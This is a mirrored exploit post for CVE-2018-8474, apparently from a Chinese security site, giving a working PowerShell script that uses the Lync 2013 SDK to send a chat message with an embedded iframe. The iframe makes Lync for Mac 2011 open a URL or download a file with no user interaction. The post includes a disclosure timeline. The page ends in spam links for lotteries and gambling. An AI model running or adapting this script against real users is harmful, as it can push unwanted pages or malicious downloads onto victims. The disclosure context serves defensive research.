首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
  當前位置:主頁>安全文章>文章資料>Exploits>文章內容
Microsoft Lync for Mac 2011 - Injection Forced Browsing/Download
來源:https://www.trustedsec.com 作者:nyxgeek 發布時間:2018-12-05  
# Exploit Title: Microsoft Lync for Mac 2011 Injection Forced Browsing/Download
# Author: @nyxgeek - TrustedSec
 
# Date: 2018-03-20
# Vendor Homepage: microsoft.com
# Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=36517
# CVE: CVE-2018-8474
# Version: Lync:Mac 2011 14.4.3, likely earlier versions
# Tested on: Lync:Mac 2011 14.4.3 (170308)
 
# Description:
# Force browsing or download via embedded iframe in a chat window. No user
# interaction required. When the iframe contains a web site URL, a new browser
# window of the default browser will open with the URL.
# If the URL is a file, it will download it automatically if it is a permitted
# file type (e.g., zip)
 
# A  write-up can be found at:
# https://www.trustedsec.com/2018/09/full-disclosure-microsoft-lync-for-mac-2011-susceptible-to-forced-browsing-download-attack/
 
# Requirements: Originating machine needs Lync 2013 SDK installed
# (https://www.microsoft.com/en-us/download/details.aspx?id=36824)
 
# Timeline of Disclosure:
#
# 07/18/2017 - Reported issue to Microsoft
# 11/22/2017 - Microsoft has reproduced problem
# 03/07/2018 - Microsoft replies that they have decided not to fix, but gave
#              their blessing for disclosure
 
 
#target user
$target = "[email protected]"
 
$message = "<iframe src='https://www.youtube.com/watch?v=9Rnr70wCQSA'></iframe>"
 
 
if (-not (Get-Module -Name Microsoft.Lync.Model))
{
    try
        {
   # you may need to change the location of this DLL
            Import-Module "C:\Program Files\Microsoft Office\Office15\LyncSDK\Assemblies\Desktop\Microsoft.Lync.Model.dll" -ErrorAction Stop
        }
    catch
        {
            Write-Warning "Microsoft.Lync.Model not available, download and install the Lync 2013 SDK http://www.microsoft.com/en-us/download/details.aspx?id=36824"
        }
}
 
 # Connect to the local Skype process
    try
    {
        $client = [Microsoft.Lync.Model.LyncClient]::GetClient()
    }
    catch
    {
        Write-Host "`nYou need to have Skype open and signed in first"
        break
    }
 
     #Start Conversation
    $msg = New-Object "System.Collections.Generic.Dictionary[Microsoft.Lync.Model.Conversation.InstantMessageContentType, String]"
 
    #Add the Message
    $msg.Add(1,$message)
 
    # Add the contact URI
    try
    {
        $contact = $client.ContactManager.GetContactByUri($target)
    }
    catch
    {
        Write-Host "`nFailed to lookup Contact"$target
        break
    }
 
 
    # Create a conversation
    $convo = $client.ConversationManager.AddConversation()
    $convo.AddParticipant($contact) | Out-Null
 
    # Set the message mode as IM
    $imModality = $convo.Modalities[1]
    # Send the message
    $imModality.BeginSendMessage($msg, $null, $imModality) | Out-Null
    # End the Convo to suppress the UI
    $convo.End() | Out-Null
 
    Write-Host "Sent the following message to "$target":`n"$message
 
[推薦] [評論(0條)] [返回頂部] [打印本頁] [關閉窗口]  
匿名評論
評論內容:(不能超過250字,需審核后才會公布,請自覺遵守互聯網相關政策法規。
 §最新評論:
  熱點文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相關文章
·HP Intelligent Management Java
·Xorg X11 Server (AIX) - Local
·Emacs movemail Privilege Escal
·OpenSSH < 7.7 - User Enumerati
·NEC Univerge Sv9100 WebPro 6.0
·NUUO NVRMini2 3.9.1 - Authenti
·Apache Superset 0.23 - Remote
·HasanMWB 1.0 SQL Injection
·Mozilla Firefox 63.0.1 - Denia
·Textpad 8.1.2 - Denial Of Serv
·Joomla! Component JE Photo Gal
·i-doit CMDB 1.11.2 - Remote Co
  推薦廣告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved
北京单场4串1是什么意思 正规捕鱼平台下载 山西新11选五胆码推荐 快三胆码拖码是什么意思 浙江20选5中奖号码 东方财富股票行情 福彩开奖号查询七乐彩 辽源大嘴棋牌大厅下载 极速赛车开奖结果网站 中超积分榜最新完整排名 喜乐彩-Welcome